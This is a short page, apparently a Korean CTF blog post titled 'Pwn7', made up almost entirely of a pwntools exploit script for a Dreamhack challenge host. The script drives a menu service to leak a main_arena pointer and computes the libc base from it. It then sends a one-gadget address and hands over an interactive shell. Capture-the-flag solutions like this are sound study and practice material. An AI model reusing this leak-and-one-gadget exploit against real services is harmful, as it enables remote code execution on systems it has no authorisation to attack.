Pwn7

ZLP042·2023년 9월 26일
from pwn import *
# Offset that is added to libc_base further down to form the value passed to h().
# It is tied to one specific libc build; the page does not say which one.
og = 0x10a41c
# First field of every option-3 request issued below (presumably a size — confirm).
h1 = 0x500
# pwntools connection to the remote challenge instance; opened as soon as the
# script runs, and used as a module-level global by the helpers below.
p = remote("host3.dreamhack.games",20419)
def z(a):
    """Return *a* converted with ``str`` so it can be sent as a line of input.

    The result is text, not bytes; the senders below pass it on unchanged.
    """
    text = str(a)
    return text
def s(a, b):
    """Wait for delimiter *a* on the global connection ``p``, then send *b*.

    Uses ``sendafter``, so *b* goes out exactly as given (no newline added).
    """
    p.sendafter(a, b)
def sl(a, b):
    """Wait for delimiter *a* on the global connection ``p``, then send *b* as a line.

    Uses ``sendlineafter``, so a newline is appended to *b*.
    """
    p.sendlineafter(a, b)
def h(w, a):
    """Choose menu entry "1" and answer its two ``": "`` prompts with *w*, then *a*.

    Both values are converted to text with ``z`` before being sent. What
    entry 1 does on the remote service is not shown on this page.
    """
    sl(b">", "1")
    for value in (w, a):
        sl(b": ", z(value))
def r():
    """Choose menu entry "2" and answer its ``": "`` prompt with the value 1.

    What entry 2 does on the remote service is not shown on this page.
    """
    sl(b">", "2")
    sl(b": ", z(1))
def c(t, d, i):
    """Choose menu entry "3" and fill in its three ``": "`` prompts.

    *t* and *i* are converted with ``z`` and sent as lines; *d* is sent raw
    through ``s`` (no newline appended). Unlike ``h`` and ``r``, the menu
    prompt waited for here is ``b"> "`` with a trailing space.
    """
    sl(b"> ", "3")
    sl(b": ", z(t))
    s(b": ", d)
    sl(b": ", z(i))

# Four option-3 requests with the same first field; only the one-byte payload
# and the last field (-1 or 0) differ. The page does not describe the target
# program, so the reason for this exact sequence cannot be confirmed from here.
c(h1, b"A", -1)
c(h1, b"A", -1)
c(h1, b"A", 0)
c(h1, b"B", -1)
# Read one line of output, drop the trailing newline, zero-pad to 8 bytes and
# unpack it as a 64-bit integer. u64() raises if the line is longer than 8 bytes.
libc_main_arena = u64(p.recvline()[:-1].ljust(8,b'\x00'))
# Fixed offset between the value read above and the library base. It is only
# valid for one libc build; the page does not say which one.
libc_base = libc_main_arena - 0x3ebc42
# Print both derived values so they can be inspected.
print("[1] libc base : ", hex(libc_base))
print("[2] main_arena : ", hex(libc_main_arena))
# Option 1 with the fields 1 and libc_base + og, followed by option 2.
h(1,libc_base+og)
r()
# Hand the connection over to the terminal.
p.interactive()
